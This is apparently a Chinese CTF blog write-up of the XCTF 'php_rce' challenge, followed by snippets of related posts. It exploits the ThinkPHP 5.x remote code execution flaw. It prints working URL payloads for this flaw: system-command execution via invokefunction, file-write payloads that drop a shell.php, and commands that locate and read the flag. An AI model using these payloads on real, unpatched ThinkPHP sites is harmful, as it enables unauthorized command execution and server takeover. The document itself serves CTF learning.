攻防世界-web-高手进阶区003-php_rce

最新推荐文章于 2022-07-22 15:21:25 发布
最新推荐文章于 2022-07-22 15:21:25 发布
阅读量329 收藏 1
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/loseheart157/article/details/107930113
版权

文章目录

题目

在这里插入图片描述
上来之后就是这个网页,没有别的提示,于是搜索ThinkPHP v5,发现了可以利用的漏洞

漏洞

5.0版本POC(不唯一)

命令执行:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]

文件写入:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php phpinfo();?>

5.1版本POC(不唯一)

命令执行:?s=index/\think\Request/input&filter=system&data=[系统命令]

文件写入:?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?

题目解法

我们输入payloadhttp://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
前面的直接套模板就行,后面的命令
find / -name "flag"用url编码后就是find%20/%20-name%20%22flag%22,这样就找到了flag所在的文件
我们在把他显示出来
cat flag,将他url编码
![?s=index/think\app/invokefunction&function=call_user_func_array&vars\[0\]=system&vars\[1\]\[\]=cat%20/flag](https://img-blog.csdnimg.cn/20200811130119180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xvc2VoZWFydDE1Nw==,size_16,color_FFFFFF,t_70)

然后就得到最后结果
在这里插入图片描述

h0ld1rs
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-Web进阶篇-007php_rce
gyy990526的博客
03-14 2276
解:打开靶机提示了是ThinkPHP V5的远程代码执行漏洞,V5.0、V5.1均有此问题 构造payload,查看目录 payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 用ls /flag和find / -name'flag'效果一样都可以找到flag文件 payload:/?s=index/think\app/
攻防世界web高手进阶php_rce,攻防世界 web高手进阶 1-5 2020.6.11
weixin_35962351的博客
03-09 276
前言继续ctf的旅程攻防世界web高手进阶的1-5题1、baby_web进去是个1.php页面里只有helloworld按题意是说想看初始网页猜测有index.php结果直接跳转到1.php查看源码在index的请求头里发现flag2、Training-WWW-Robots这题不就是个robots嘛没什么好说的了进入robots.txt发现php进入php发现flag3、Web_python_t...
攻防世界 XCTF】 WEB 高手进阶 php_rce ——最全面、最直观的WP
algae
05-04 698
攻防世界web高手进阶 php_rce
weixin_61835841的博客
04-21 1740
工具 火狐 1.打开链接,观察到这是一个Think PHP V5 框架 2.尝试输入index.php,发现页面没有变化,继续输入下一级文件(随便输入),发现爆出了版本5.0.20 3.查询相关版本的漏洞(百度或者github)都可以试试 、 查询到的payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 放进去尝试发现可
【XCTF 攻防世界WEB 高手进阶 PHP_RCE
weixin_45844670的博客
08-09 408
题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5412 本题学到的: 使用 https://www.exploit-db.com/ 这个网站查漏洞,看网站有无可乘之机。 过程: 根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1 这里的payload: ?s=/index/\think\app/invokefunction&function=call_us
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
远程POC-SMBGhost_RCE_PoC.zip
06-09
CVE-2020-0796漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客...
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
fastjson_rce_tool-master.zip
05-14
《深入解析Fastjson RCE漏洞及利用工具》 Fastjson是阿里巴巴开源的一个高性能的JSON库,广泛应用于Java项目中,由于其高效的解析速度和简洁的API设计,深受开发者喜爱。然而,随着其广泛应用,安全问题也逐渐浮出...
攻防世界web进阶_php_rce
chy082的博客
08-21 323
上网查一下ThinkPHP v5,发现有rce漏洞 找到网上的payload: /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 看看上级目录 http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&v
攻防世界web高手进阶php_rce,XCTF攻防世界_Web进阶001
weixin_39599654的博客
03-09 751
XCTF攻防世界_Web进阶001XCTF攻防世界_Web进阶001XCTF_Web_高手进阶baby_webTraining-WWW-RobotsWeb_php_unserializephp_rcebaby_web(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.p...
攻防世界-web-进阶-php_rce
weixin_31610083的博客
11-10 3184
【题目描述】 无 【附件】 无 【过程及思路】 打开在线场景。 是一个关于ThinkPHP的页面,看起来没什么特别的,几个链接点进去也都是正常的官方链接。 我们尝试到github搜索ThinkPHP V5,发现有相关的“远程代码执行”漏洞集合。 RCE(远程代码执行漏洞) 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。...
攻防世界web高阶(php rce
ctfmove1的博客
07-16 608
需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了) payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars
攻防世界 web php_rce emmm
Rashu99's blog
06-14 345
漏洞原理 /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%2
攻防世界 php_rce 解题思路
xj28555的博客
07-06 1649
进入页面 发现是一个ThinkPHP的框架而且正好是v5.0版本。这个版本存在远程命令执行的漏洞,程序未对控制器进行过滤,导致攻击者可以通过\符号调用任意类。具体漏洞原理分析挂上链接https://www.cnblogs.com/backlion/p/10106676.html 这只使用payload/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&am..
攻防世界web进阶全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2400
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
php命令执行漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析
weixin_31308407的博客
03-21 793
0x01 漏洞利用方式5.0版本POC(不唯一)命令执行:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]文件写入:?s=index/\think\app/invokefunction&function=call_user_...
ThinkPHP 5.1反序列化分析和poc
weixin_42282189的博客
07-22 1074
最近挖不出漏洞了,所以来学习一下反序列化。毕竟测试的系统连个页面也没有,只给了十几个接口。之前对反序列化只停留在基础的原理层面,所以这次着重一下分析思想和如何写poc上面。所以就拿最经典的分析。...
攻防世界php_rce
最新发布
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的payload,而引用中的payload则是用于执行"cat /flag"命令的。这些payload利用了PHP解释器中的函数调用漏洞,通过构造特定的函数调用参数来执行系统命令。所以,这些payload可以用于远程执行系统命令,如列出/flag目录下的文件或显示/flag文件的内容。请注意,这些payload仅用于演示和研究目的,并且在现实环境中使用它们是违法的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值